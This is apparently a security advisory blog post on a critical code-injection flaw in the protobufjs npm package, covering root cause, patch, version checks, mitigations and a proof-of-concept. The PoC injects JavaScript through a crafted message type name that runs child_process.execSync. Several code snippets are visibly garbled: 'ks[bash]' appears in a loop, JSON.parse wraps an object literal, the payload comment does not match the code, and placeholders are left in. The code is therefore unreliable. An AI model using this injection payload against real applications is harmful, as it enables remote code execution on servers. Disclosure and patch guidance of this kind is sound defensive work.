protobufjs, Code Injection (CWE-94), CVE-2026-41242 (Critical)

Listen to this Post

This critical remote code execution (RCE) vulnerability in the `protobufjs` npm package arises from unsafe dynamic code generation. The library uses a `codegen` module to build JavaScript functions for message types via string concatenation, which are then executed using the `Function()` constructor. However, it fails to sanitize user-controlled message type names, allowing an attacker to inject arbitrary JavaScript code that will run when the application creates or decodes a message using a malicious schema:
Root Cause: The vulnerability exists in the `Type.generateConstructor` function. It passes an unsanitized message type name (mtype.name) directly into the constructor code.
Injection Vector: An attacker controls a protobuf schema or JSON descriptor, providing a crafted message name containing an injection payload such as X(p){ATTACKER_PAYLOAD};if(true){//.
Generated Code: The `codegen` module creates a function function X(p){...}. The injection payload breaks out of the intended name context. The `ATTACKER_PAYLOAD` is written directly into the function’s body.
Exploitation Mechanism: The attacker-controlled payload is executed when the application later attempts to `decode` a message of that type or creates a message instance using new ctor(props).
Privilege Context: The injected code executes with the full privileges of the Node.js process, posing high risks of system compromise, data theft, and lateral movement.

dailycve form

Platform: Node.js / Web
Version: ≤8.0.0 & ≤7.5.4
Vulnerability : Code Injection
Severity: Critical (CVSS 9.4)
Date: 18 April 2026

Prediction: Patch already released (8.0.1 / 7.5.5)

Analysis under What Undercode Say:

Vulnerable Code Pattern (`src/type.js`) :

// Vulnerable code generation (simplified)
Type.generateConstructor = function() {
var gen = util.codegen(["p"], mtype.name); // UNSANITIZED input used as function name
gen(" if(p)for(var ks=Object.keys(p),i=0;i<ks.length;++i)if(p[ks[bash]]!=null)");
gen(" this[ks[bash]]=p[ks[bash]];");
return gen;
};
// What happens when gen.toString() is called
// This creates a string similar to: "function MALICIOUS_NAME(p){ ... }"
// The Function() constructor then executes this string to create the constructor.

Safe Code Pattern (Patch Diff) :

// Patched version (8.0.1 / 7.5.5) sanitizes the name
var typeName = mtype.name.replace(/[^a-zA-Z0-9_]/g, ''); // Strips non-alphanumeric characters
var gen = util.codegen(["p"], typeName);
// ... rest of the generation logic

Dependency Check (Bash) :

Detect if vulnerable version is installed
npm list protobufjs
Update to a patched version
npm install protobufjs@latest installs 8.0.1 or higher
OR for projects using the 7.x branch
npm install [email protected]
Check for specific vulnerable versions
npm list protobufjs | grep -E '(7.5.4|8.0.0)$'

Exploit:

Proof-of-Concept (PoC): The following demonstrates injecting a payload via a JSON descriptor.

const protobuf = require('protobufjs');
// Malicious descriptor where the type name contains the payload.
// The payload is: console.log(require('child_process').execSync('whoami').toString())
const maliciousDescriptor = JSON.parse({
"nested": {
"User": {
"fields": {
"id": { "type": "int32", "id": 1 },
"data": { "type": "Data(){console.log(require('child_process').execSync('id').toString())};function X", "id": 2 }
}
},
"Data(){console.log(require('child_process').execSync('id').toString())};function X": {
"fields": { "content": { "type": "string", "id": 1 } }
}
}
});
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from(...); // Arbitrary encoded message
// The payload executes when the message is decoded
const user = UserType.decode(userBytes);

Protection from this CVE:

1. Immediate Upgrade: Update `protobufjs` to version 8.0.1, 7.5.5, or any subsequent release. This is the complete and primary fix.
2. Validate Untrusted Schemas: If upgrading is not immediately possible, treat all external protobuf schemas as untrusted input. Do not use `Root.fromJSON()` or `protobuf.load()` with user-supplied content.
3. Isolate Processing: Always parse, validate, and process any untrusted schemas in a completely isolated environment, such as a sandboxed worker thread or a separate service.

Impact:

– Remote Code Execution: An attacker who can supply a malicious protobuf schema can execute arbitrary JavaScript commands on the target server or application.
– Full System Compromise: This can lead to the exfiltration of environment variables, credentials, and source code, and potentially provide a beachhead for pivoting to internal systems.
– Wide Supply Chain Risk: `protobufjs` is an indirect dependency for many libraries, including @grpc/proto-loader, Firebase SDKs, and Google Cloud SDKs, greatly expanding the potential attack surface.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top